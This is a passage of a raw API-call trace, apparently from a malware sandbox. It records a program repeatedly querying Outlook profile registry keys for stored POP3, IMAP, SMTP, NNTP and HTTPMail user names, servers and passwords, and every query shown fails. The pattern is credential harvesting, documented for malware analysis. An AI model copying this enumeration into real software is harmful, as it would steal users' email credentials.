[0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.293] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.293] RegCloseKey (hKey=0x948) returned 0x0 [0249.293] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.294] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.294] RegCloseKey (hKey=0x948) returned 0x0 [0249.294] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.295] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.295] RegCloseKey (hKey=0x948) returned 0x0 [0249.295] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.295] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.295] RegCloseKey (hKey=0x948) returned 0x0 [0249.295] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x1c4de40 | out: phkResult=0x1c4de40*=0x948) returned 0x0 [0249.295] RegEnumKeyExA (in: hKey=0x948, dwIndex=0x0, lpName=0x1c4de50, lpcchName=0x1c4e678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4e678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.295] RegCloseKey (hKey=0x948) returned 0x0 [0249.295] LocalFree (hMem=0xd199b10) returned 0x0 [0249.295] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x3, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.295] RegCloseKey (hKey=0x95c) returned 0x0 [0249.295] LocalFree (hMem=0x5d68100) returned 0x0 [0249.295] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0xa, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="9907df9e4a472f499f281fc91ee2bca1", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.295] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.295] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67220 [0249.295] wsprintfA (in: param_1=0x5d67220, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1") returned 88 [0249.295] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.295] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.295] RegCloseKey (hKey=0x95c) returned 0x0 [0249.295] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.295] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.295] RegCloseKey (hKey=0x95c) returned 0x0 [0249.295] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.295] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.295] RegCloseKey (hKey=0x95c) returned 0x0 [0249.295] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.296] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.296] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.296] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.297] RegCloseKey (hKey=0x95c) returned 0x0 [0249.297] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.297] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: 